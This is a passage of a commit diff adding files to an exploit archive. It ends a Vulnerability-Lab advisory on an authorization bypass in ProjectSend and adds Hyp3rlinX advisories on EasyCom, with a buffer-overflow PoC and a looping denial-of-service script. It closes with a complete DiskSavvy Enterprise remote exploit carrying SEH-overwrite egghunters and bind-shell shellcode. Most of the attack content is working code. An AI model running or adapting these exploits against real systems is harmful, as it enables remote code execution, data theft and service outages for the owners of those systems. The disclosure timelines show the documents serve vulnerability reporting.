As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References
|
||||
allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point
|
||||
to other client account names, which allows an attackers to download others clients private data with no secure method provided.
|
||||
|
||||
Vulnerability Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] process.php?do=zip_download
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] client
|
||||
[+] file
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...
|
||||
|
||||
2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension
|
||||
|
||||
--- PoC Session Logs ---
|
||||
GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: http://localhost/ProjectSend-r754/my_files/
|
||||
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
|
||||
Connection: keep-alive
|
||||
-
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 05 Feb 2017 19:07:41 GMT
|
||||
Server: Apache/2.2.22 (Debian)
|
||||
X-Powered-By: PHP/5.4.44-0+deb7u1
|
||||
Expires: Sat, 26 Jul 1997 05:00:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
|
||||
Pragma: no-cache
|
||||
Vary: Accept-Encoding
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html
|
||||
Content-Length: 6
|
||||
|
||||
Name of Files: .jpg
|
||||
|
||||
|
||||
Video PoC:
|
||||
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
167
platforms/windows/dos/41425.txt
Executable file
167
platforms/windows/dos/41425.txt
Executable file
|
@ -0,0 +1,167 @@
|
|||
[+] Credits: John Page AKA Hyp3rlinX
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
================
|
||||
easycom-aura.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===========================
|
||||
EASYCOM AS400 (iBMI) PHP API
|
||||
EasycomPHP_4.0029.iC8im2.exe
|
||||
|
||||
EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
|
||||
with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
|
||||
Windows, Linux, and IBMi.
|
||||
|
||||
|
||||
EasyCom tested here requires older version of PHP.
|
||||
|
||||
Setup test environment:
|
||||
|
||||
Windows 7
|
||||
XAMPP 1.7.3
|
||||
PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
|
||||
Copyright (c) 1997-2009 The PHP Group
|
||||
Zend Engine v2.3.0
|
||||
|
||||
PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=========================
|
||||
API Stack Buffer Overflow
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-5358
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
|
||||
Below I provide some proof of concept details for a few of them.
|
||||
|
||||
|
||||
EAX 00000000
|
||||
ECX 41414141
|
||||
EDX 771D6ACD ntdll.771D6ACD
|
||||
EBX 00000000
|
||||
ESP 00C0F238
|
||||
EBP 00C0F258
|
||||
ESI 00000000
|
||||
EDI 00000000
|
||||
EIP 41414141
|
||||
|
||||
C 0 ES 002B 32bit 0(FFFFFFFF)
|
||||
P 1 CS 0023 32bit 0(FFFFFFFF)
|
||||
A 0 SS 002B 32bit 0(FFFFFFFF)
|
||||
Z 1 DS 002B 32bit 0(FFFFFFFF)
|
||||
S 0 FS 0053 32bit 7EFDD000(FFF)
|
||||
T 0 GS 002B 32bit 0(FFFFFFFF)
|
||||
D 0
|
||||
O 0 LastErr ERROR_SUCCESS (00000000)
|
||||
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
|
||||
|
||||
|
||||
SEH chain of main thread
|
||||
Address SE handler
|
||||
00C0F354 kernel32.7600410E
|
||||
00C0FF78 42424242
|
||||
52525252 *** CORRUPT ENTRY ***
|
||||
|
||||
WinDbg dump...
|
||||
|
||||
(720.a70): Access violation - code c0000005 (first/second chance not available)
|
||||
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
|
||||
eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
|
||||
eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
|
||||
41414141 ?? ???
|
||||
0:000> !load winext/msec
|
||||
0:000> !exploitable
|
||||
|
||||
!exploitable 1.6.0.0
|
||||
Exploitability Classification: EXPLOITABLE
|
||||
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
|
||||
called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
|
||||
|
||||
User mode DEP access violations are exploitable.
|
||||
|
||||
|
||||
PHP Crash:
|
||||
=============
|
||||
|
||||
Problem signature:
|
||||
Problem Event Name: BEX
|
||||
Application Name: php.exe
|
||||
Application Version: 5.3.1.0
|
||||
Application Timestamp: 4b06c430
|
||||
Fault Module Name: StackHash_e98d
|
||||
Fault Module Version: 0.0.0.0
|
||||
Fault Module Timestamp: 00000000
|
||||
Exception Offset: 41414141
|
||||
Exception Code: c0000005
|
||||
Exception Data: 00000008
|
||||
OS Version: 6.1.7601.2.1.0.256.48
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
===============
|
||||
php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
|
||||
|
||||
<?php
|
||||
|
||||
/* Basic connection to an AS400 iBMI System */
|
||||
|
||||
$payload=str_repeat("A", 4000); #BOOM!
|
||||
$payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100); #SEH
|
||||
|
||||
$conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg()); #VULN
|
||||
$conn = i5_pconnect($payload, 'QSECOFR', 'password', array() ); #VULN
|
||||
$conn = i5_private_connect($payload, $user, $password, array()); #VULN
|
||||
|
||||
echo 'EasyCom PHP API 0day ' . $conn;
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
==========
|
||||
High
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: December 22, 2016
|
||||
Vendor acknowledgement: December 23, 2016
|
||||
Vendor Release Fix/Version February 20, 2017
|
||||
February 22, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
99
platforms/windows/dos/41426.txt
Executable file
99
platforms/windows/dos/41426.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
[+] Credits: John Page AKA Hyp3rlinX
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
================
|
||||
easycom-aura.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===========
|
||||
SQL iPlug
|
||||
EasycomPHP_4.0029.iC8im2.exe
|
||||
|
||||
SQL iPlug provides System i applications real-time access to heterogeneous and external databases
|
||||
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Denial Of Service
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-5359
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
|
||||
HTTP requests fed to the "D$EVAL" parameter.
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
============
|
||||
|
||||
import socket
|
||||
|
||||
print 'EasyCom SQL-IPLUG DOS 0day!'
|
||||
print 'hyp3rlinx'
|
||||
|
||||
IP = raw_input("[IP]> ")
|
||||
PORT = 7078
|
||||
payload="A"*43000
|
||||
|
||||
arr=[]
|
||||
c=0
|
||||
while 1:
|
||||
try:
|
||||
arr.append(socket.create_connection((IP,PORT)))
|
||||
arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
|
||||
c+=1
|
||||
print "doit!"
|
||||
except socket.error:
|
||||
print "[*] 5th ave 12:00"
|
||||
raw_input()
|
||||
break
|
||||
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: December 22, 2016
|
||||
Vendor acknowledgement: December 23, 2016
|
||||
Vendor Release Fix/Version February 20, 2017
|
||||
February 22, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
===========
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
98
platforms/windows/remote/41436.py
Executable file
98
platforms/windows/remote/41436.py
Executable file
|
@ -0,0 +1,98 @@
|
|||
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
|
||||
# Date: 2017-02-22
|
||||
# Exploit Author: Peter Baris
|
||||
# Vendor Homepage: www.saptech-erp.com.au
|
||||
# Software Link: http://www.disksavvy.com/downloads.html
|
||||
# Version: 9.4.18
|
||||
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
|
||||
|
||||
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
|
||||
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
|
||||
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
|
||||
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
try:
|
||||
host = sys.argv[1]
|
||||
os = sys.argv[2]
|
||||
port = 80
|
||||
except IndexError:
|
||||
print "[+] Usage %s <host> win7/win10" % sys.argv[0]
|
||||
print "[i] Example: dsavvy.py localhost win10"
|
||||
sys.exit()
|
||||
|
||||
|
||||
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
|
||||
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
|
||||
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
|
||||
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
|
||||
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
|
||||
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
|
||||
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
|
||||
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
|
||||
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
|
||||
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
|
||||
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
|
||||
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
|
||||
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
|
||||
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
|
||||
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
|
||||
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
|
||||
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
|
||||
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
|
||||
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
|
||||
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
|
||||
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
|
||||
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
|
||||
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
|
||||
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
|
||||
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
|
||||
|
||||
crash = "\x41" * 2487
|
||||
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
|
||||
filler = "\x44" * (2505-334-300-100)
|
||||
nseh = "\xeb\x08\x90\x90"
|
||||
stack_fill="\x41"*100
|
||||
nops="\x90"*8
|
||||
egg = "t00wt00w"
|
||||
|
||||
if os == "win7":
|
||||
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
|
||||
"\x33\xd2"
|
||||
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
|
||||
"\x2e\x5a\x3c\x05\x74\xef\xb8"
|
||||
"\x74\x30\x30\x77"
|
||||
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
|
||||
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
|
||||
|
||||
elif os == "win10":
|
||||
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
|
||||
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
|
||||
"\x74\x30\x30\x77"
|
||||
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
|
||||
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
|
||||
|
||||
else:
|
||||
print "[!] This windows version is not supported yet"
|
||||
exit(0)
|
||||
|
||||
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
|
||||
|
||||
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
|
||||
buffer+= "Host: "+host+"\r\n"
|
||||
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
|
||||
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
|
||||
buffer+="Accept-Encoding: gzip, deflate\r\n"
|
||||
buffer+="Referer: http://"+host+"/login\r\n"
|
||||
buffer+="Connection: keep-alive\r\n"
|
||||
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
buffer+="Content-Length: 5900\r\n\r\n"
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect((host,port))
|
||||
s.send(buffer)
|
||||
s.close()
|
||||
|
Loading…
Add table
Reference in a new issue